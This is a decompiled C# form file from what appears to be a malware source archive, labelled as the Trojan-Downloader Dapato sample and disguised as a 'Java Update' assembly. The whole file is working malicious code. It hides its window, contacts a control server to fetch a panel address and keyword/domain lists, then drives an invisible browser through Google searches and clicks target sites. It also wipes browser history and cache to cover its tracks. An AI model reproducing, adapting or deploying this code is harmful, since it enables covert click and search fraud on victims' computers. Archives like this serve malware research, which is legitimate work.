MalwareSourceCode/MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/browser_bastan/Form1.cs
2022-08-18 06:28:56 -05:00

381 lines
13 KiB
C#

// Decompiled with JetBrains decompiler
// Type: browser_bastan.Form1
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
public sealed class Form1 : Form
{
private const int GWL_EXSTYLE = -20;
private const int WS_EX_TOOLWINDOW = 128;
private const int INTERNET_OPTION_END_BROWSER_SESSION = 42;
private IContainer components;
private WebBrowser webBrowser1;
private string ana = "http://www.nurullahuzmez.com";
private string baba = "http://[DEGISTIR]/v/v.php";
private Queue<KeyValuePair<string, string>> kelimelistesi = new Queue<KeyValuePair<string, string>>();
private string kelime;
private string domain;
private int suankisayfa = 1;
private Dictionary<string, bool> gezilenler = new Dictionary<string, bool>();
private Random rnd = new Random();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.webBrowser1 = new WebBrowser();
this.SuspendLayout();
this.webBrowser1.Dock = DockStyle.Fill;
this.webBrowser1.IsWebBrowserContextMenuEnabled = false;
this.webBrowser1.Location = new Point(0, 0);
this.webBrowser1.Name = "webBrowser1";
this.webBrowser1.ScriptErrorsSuppressed = true;
this.webBrowser1.Size = new Size(761, 488);
this.webBrowser1.TabIndex = 0;
this.webBrowser1.WebBrowserShortcutsEnabled = false;
this.webBrowser1.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.webBrowser1_DocumentCompleted);
this.webBrowser1.NewWindow += new CancelEventHandler(this.webBrowser1_NewWindow);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(761, 488);
this.Controls.Add((Control) this.webBrowser1);
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.StartPosition = FormStartPosition.CenterScreen;
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
[DllImport("user32.dll")]
public static extern bool SetForegroundWindow(IntPtr hWnd);
[DllImport("user32.dll")]
public static extern int SetWindowLong(IntPtr window, int index, int value);
[DllImport("user32.dll")]
public static extern int GetWindowLong(IntPtr window, int index);
[DllImport("winmm.dll")]
public static extern int sndPlaySound(string lpszSoundName, int uFlags);
[DllImport("wininet.dll", SetLastError = true)]
private static extern bool InternetSetOption(
IntPtr hInternet,
int dwOption,
IntPtr lpBuffer,
int lpdwBufferLength);
public Form1() => this.InitializeComponent();
private void webBrowser1_NewWindow(object sender, CancelEventArgs e) => e.Cancel = true;
private void Basla()
{
this.DeleteCache();
try
{
this.suankisayfa = 1;
KeyValuePair<string, string> keyValuePair = this.kelimelistesi.Dequeue();
this.kelime = keyValuePair.Key;
this.domain = keyValuePair.Value;
while (this.webBrowser1.IsBusy)
Thread.SpinWait(10000);
this.webBrowser1.Navigate("http://www.google.com.tr");
}
catch (InvalidOperationException ex)
{
Environment.Exit(-1);
}
}
private void KelimeleriCek()
{
using (WebClient webClient = new WebClient())
{
string str1 = "";
try
{
str1 = webClient.DownloadString(this.baba);
}
catch (Exception ex)
{
Environment.Exit(-1);
}
string str2 = str1;
char[] chArray = new char[1]{ '\n' };
foreach (string str3 in str2.Split(chArray))
{
string[] strArray = str3.Trim().Split('|');
try
{
string key = strArray[1];
KeyValuePair<string, string> keyValuePair = new KeyValuePair<string, string>(strArray[0], key);
this.gezilenler.Add(key, false);
this.kelimelistesi.Enqueue(keyValuePair);
}
catch
{
}
}
}
}
private void BirineTikla()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute("name").Contains("btnG") || htmlElement.GetAttribute("name").Contains("btnK"))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonaTekrarTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("button"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void webBrowser1_DocumentCompleted(
object sender,
WebBrowserDocumentCompletedEventArgs e)
{
string str = e.Url.ToString();
if (str == "http://www.google.com.tr/")
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
this.TextBoxYaz("name", "q", this.kelime);
this.SureliIslet(new Form1.SureliFonksiyon(this.SubmitForm), 4000, 5000);
}), 2000, 4000);
else if (str.StartsWith("http://www.google.com.tr") && str.Contains("hl=tr"))
{
int suankisayfa = this.suankisayfa;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.LinkeTikla(this.domain))
return;
this.SureliIslet(new Form1.SureliFonksiyon(this.Ilerle), 5000, 12000);
}), 3000, 6000);
}
else
{
if (!str.Contains(this.domain) || str.StartsWith("http://www.google.com"))
return;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.gezilenler[this.domain])
return;
this.gezilenler[this.domain] = true;
this.RastGeleGez();
}), 20000, 50000);
}
}
private void SubmitForm()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("Form"))
htmlElement.InvokeMember("submit");
}
private void Ilerle()
{
++this.suankisayfa;
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
if (link.OuterText == this.suankisayfa.ToString() || link.OuterText == this.suankisayfa.ToString() + " ")
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("click");
}
}
}
private void RastGeleGez()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
HtmlElementCollection elementsByTagName = this.webBrowser1.Document.GetElementsByTagName("a");
List<HtmlElement> htmlElementList = new List<HtmlElement>(elementsByTagName.Count);
if (elementsByTagName.Count > 0)
{
foreach (HtmlElement htmlElement in elementsByTagName)
{
if (htmlElement.GetAttribute("target") != "_blank" && !string.IsNullOrEmpty(htmlElement.InnerText) && this.NormalLink(htmlElement.GetAttribute("href")))
htmlElementList.Add(htmlElement);
}
if (htmlElementList.Count > 0)
{
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmouseover");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmousedown");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].InvokeMember("click");
htmlElementList.Clear();
}
}
this.SureliIslet((Form1.SureliFonksiyon) (() => this.SureliIslet(new Form1.SureliFonksiyon(this.Basla), 240001, 241000)), 5000, 6000);
}
private bool NormalLink(string url) => !url.EndsWith("xml") && !url.EndsWith("@") && !url.EndsWith("SetHomePage") && !url.EndsWith("AddFavorite") && !url.EndsWith(".jpg") && !url.EndsWith(".gif") && !url.EndsWith(".png") && !url.EndsWith(".rar") && !url.EndsWith(".zip") && !url.EndsWith(".vcf") && !url.EndsWith(".exe") && !url.EndsWith(".mp3") && !url.EndsWith(".mp4") && !url.EndsWith("mailto");
private void DeleteCache()
{
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 1"
}).WaitForExit();
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 8"
}).WaitForExit();
Form1.InternetSetOption(IntPtr.Zero, 42, IntPtr.Zero, 0);
}
private void TextBoxYaz(string att, string attname, string attvalue)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(att).Equals(attname))
htmlElement.SetAttribute("value", attvalue);
}
}
private bool LinkeTikla(string url)
{
bool flag = false;
List<string> stringList = new List<string>();
if (this.webBrowser1.Document != (HtmlDocument) null)
{
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
string attribute = link.GetAttribute("href");
stringList.Add(attribute);
if (!attribute.Contains("//webcache.googleusercontent.com") && !attribute.Contains("&amp;q=related:") && link.GetAttribute("href").Contains(url))
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("Click");
flag = true;
break;
}
}
}
return flag;
}
private void SureliIslet(Form1.SureliFonksiyon x, int min, int max)
{
System.Windows.Forms.Timer timer = new System.Windows.Forms.Timer()
{
Interval = this.rnd.Next(min, max)
};
timer.Tick += (EventHandler) ((s, ev) =>
{
x();
((System.Windows.Forms.Timer) s).Stop();
((Component) s).Dispose();
});
timer.Start();
}
private void PanelAyarla()
{
string newValue = "";
WebHeaderCollection headerCollection1 = new WebHeaderCollection();
headerCollection1.Add("User-Agent", "Mozilla/4.0 (compatiple; MSIE 6.0; Windows NT 5.1)");
WebHeaderCollection headerCollection2 = headerCollection1;
using (WebClient webClient = new WebClient()
{
Encoding = Encoding.Default,
Headers = headerCollection2
})
{
try
{
newValue = new Regex("1(.*?)2", RegexOptions.IgnoreCase | RegexOptions.Compiled).Match(webClient.DownloadString(this.ana)).Groups[1].ToString();
}
catch (Exception ex)
{
Environment.Exit(-1);
}
}
this.baba = this.baba.Replace("[DEGISTIR]", newValue);
}
private void Form1_Load(object sender, EventArgs e)
{
this.Size = new Size(this.rnd.Next(1024, 1366), this.rnd.Next(768, 768));
Form1.SetWindowLong(this.Handle, -20, Form1.GetWindowLong(this.Handle, -20) | 128);
this.ieKontrol();
this.PanelAyarla();
this.KelimeleriCek();
Araclar.DisableClickSounds();
this.Basla();
}
private void ieKontrol()
{
if (new WebBrowser().Version.Major < 7)
Environment.Exit(-1);
}
private delegate void SureliFonksiyon();
}
}